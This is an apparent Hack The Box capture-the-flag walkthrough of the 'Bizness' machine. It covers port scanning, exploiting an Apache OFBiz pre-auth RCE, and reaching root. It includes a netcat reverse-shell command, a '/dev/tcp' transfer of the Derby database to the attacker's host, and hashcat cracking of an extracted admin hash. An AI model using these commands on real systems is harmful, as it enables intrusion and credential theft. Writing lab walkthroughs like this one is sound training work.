Bizness

🔗 Bizness
Task 0 - Deploy machine
🎯 Target IP: 10.129.237.34
Create a directory on the Desktop with the machine's name, and inside this directory, create another directory to store the materials and outputs needed to run the machine, including the scans made with nmap.
After this we run the VPN to be able to reach the lab: openvpn htb_vpn.ovpn
Task 1 - Reconnaissance
su
echo "10.129.237.34 bizness.htb" >> /etc/hosts
mkdir -p htb/bizness.htb
cd htb/bizness.htb
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 bizness.htb
PING bizness.htb (10.129.237.34) 56(84) bytes of data.
64 bytes from bizness.htb (10.129.237.34): icmp_seq=1 ttl=63 time=50.8 ms
64 bytes from bizness.htb (10.129.237.34): icmp_seq=2 ttl=63 time=56.0 ms
64 bytes from bizness.htb (10.129.237.34): icmp_seq=3 ttl=63 time=53.3 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target should be a *nix system, while Windows systems usually have a TTL of 128 secs.
1.1 - How many TCP ports are listening on Bizness?
Let's start right away with an active port scan with nmap
sudo nmap -p0- -sS -Pn -T4 -vvv bizness.htb -oN nmap/tcp_port_scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
443/tcp open https syn-ack ttl 63
45853/tcp open unknown syn-ack ttl 63
sT
TCP connect port scan (Default without root privilege)
sC
Run default scripts
sV
Enumerate versions
vvv
Verbosity
T4
Run a bit faster
oN
Output to file with nmap formatting
It looks like there are 4 open TCP ports on the machine: 22,80,443,45853.
Then, we can proceed to analyze services active on open ports:
sudo nmap -sV -sC -p 22,80,443,45853 bizness.htb -oN nmap/service_port_scan
ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
45853/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2 - What Enterprise Resource Planning (ERP) backend is in use?
Web servers have installed nginx vs 1.18, we can confirm it and know other info using: whatweb bizness.htb
command:
http://bizness.htb [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.129.237.34], RedirectLocation[https://bizness.htb/], Title[301 Moved Permanently], nginx[1.18.0]
https://bizness.htb/ [200 OK] Bootstrap, Cookies[JSESSIONID], Country[RESERVED][ZZ], Email[info@bizness.htb], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[JSESSIONID], IP[10.129.237.34], JQuery, Lightbox, Script, Title[BizNess Incorporated], nginx[1.18.0]
Then, go to web server via browser:

Doing a directory enumeration with Dirb tool and checking source page we don't discover others useful thing.
dirb https://bizness.htb

We discover an interesting page that contains login form and the version of ERP:
https://bizness.htb/accounting/control/main

1.3 - What version of OFBiz is running on the target system?
OFBiz vs is already present into last screen:
Task 2 - Exploitation & User Flag
2.1 - What is the 2023 CVE ID for a pre-authentication, remote code execution vulnerability on this version of OFBiz?
Using searchsploit tool we can discover quickly an exploit for this version of Apache OFBiz

search it on google to check potential alternatives and find the relative CVE ID

this CVE is about 2024, so we need to check another CVE for 2023, so google: "ofbiz 18.12 CVE 2023"

and we found a CVE about 2023 on nist site:
https://nvd.nist.gov/vuln/detail/cve-2023-49070
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10
2.2 - What user is the OFBiz service running as?
There's a PoC to exploit it on github: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass that contains all which we need: PoC and ysoserial-all.jar tool
Always be careful what you download, open source / github does not mean 100% harmless program
Download files locally using git clone command:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git

check our attacker box machine IP using ifconfig tun0
go in listening mode using netcat nc -lvnp 1339
and into another shell, go run our exploit spawning a /bin/bash shell
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.17.177 1339'

2.3 - Submit the flag located in the ofbiz user's home directory.
Go to the user home dir using cd ~ and cat the user flag

Task 3 - Privilege Escalation & Root Flag
3.1 - What is the full path of the directory that OFBiz is installed in?
We can find it into /opt directory

3.2 - What hashing algorithm is the OFBiz installation configured to use for passwords?
To make our shell interactive and more usable run this command: python3 -c 'import pty;pty.spawn("/bin/bash")'
and start to search into a configuration files the hashing algorithm used.

there's an interesting file at the path: /opt/ofbiz/framework/security/config that contains the answer:

3.3 - What database is used by Apache OFBiz, by default?
Search directory that regards database among the folders regarding data.
We found an interesting file at the path: /opt/ofbiz/runtime/data/derby/derby.log
that contains db logs with correspective db name and its version

3.4 - In which directory are the Derby-related files stored on Bizness?
Navigating into folders there's an interesting file at path: /opt/ofbiz/runtime/data/derby/ofbiz/seg0 with more files .dat


Search into them if there's an 'admin' string using this command: grep -a -l 'admin.$' *.dat
to search only interesting files that should contains sensitive administrative strings

and into file called: c6650.dat we found this value: admin$"$SHA$$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
3.5 - Using derby-tools and the ij
command-line utility, what is the command within ij
to connect to a database stored in ./ofbiz
?
ij
command-line utility, what is the command within ij
to connect to a database stored in ./ofbiz
?Maybe, I've already gone too far with the previous question.

ij utility seems be not present into these machine, so we can transfer .dat files and install ij utility on our kali attacker machine.
Archive file using:
tar cvf /dev/shm/derby.tar derby
Transfer derby files to attacker machine:
Go in listening mode on attacker machine:
nc -lvnp 4433 > derby.tar
Send file via netcat:
cat /dev/shm/derby.tar > /dev/tcp/10.10.17.177/4433

Now we've a db on attacker machine, unzip the db archieve using: tar -xvf derby.tar
and we can install ij to connect db:
sudo apt-install derby-tools
ij
protocol 'jdbc:derby';
connect 'jdbc:derby:./ofbiz;create=true';
show tables;

In my case i've add an additional flag 'true' to to start the connection correctly.
3.6 - Which table contains the SHA-1 hash of the admin
user?
admin
user?Querying db we can discover the table that cotnains the SHA-1 hash of the admin user:
select * from OFBIZ.USER_LOGIN;
describe OFBIZ.USER_LOGIN;
select USER_LOGIN_ID,CURRENT_PASSWORD FROM OFBIZ.USER_LOGIN;
That's of course the same that we already know: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
3.7 - What is the hex version of the discovered hash?
We know that the psw hash: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
is in SHA1-based format
$SHA$
: This indicates the use of the SHA-1 hashing algorithm.d
: This is the salt used in the hashing process.uP0_QaVBpDWFeo8-dRzDqRwXQ2I
: This is the Base64 URL-encoded hash. After decoding, this represents the actual hash value.
Decoding the Base64 URL-encoded String
echo "uP0_QaVBpDWFeo8-dRzDqRwXQ2I" | base64 -d | xxd -p > hash.txt
base64 -d
: This decodes the Base64 URL-encoded string.xxd -p
: This converts the decoded bytes into a plain hexadecimal format. We need the hexadecimal version of the hash to use it in hashcat.
This generates a file hash.txt containing the decoded hash in hexadecimal format.
At this point, we have the decoded hash and we know the salt (d
). However, hashcat expects the input hash to be in the format: <hash>:<salt>
echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > hash.txt
3.7 - What is the root user's password?
Now, we can proceeding to cracking hash using hashcat, using the -m 120 thatcorresponds to the hashing algorithm sha1($salt.$pass)
hashcat -m 120 hash.txt /usr/share/wordlists/rockyou.txt
obtaining our psw in cleartext: b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness

3.8 - Submit the flag located in the root user's home directory.
Finally, we know the admin password and we can access using sudo command: su -


Last updated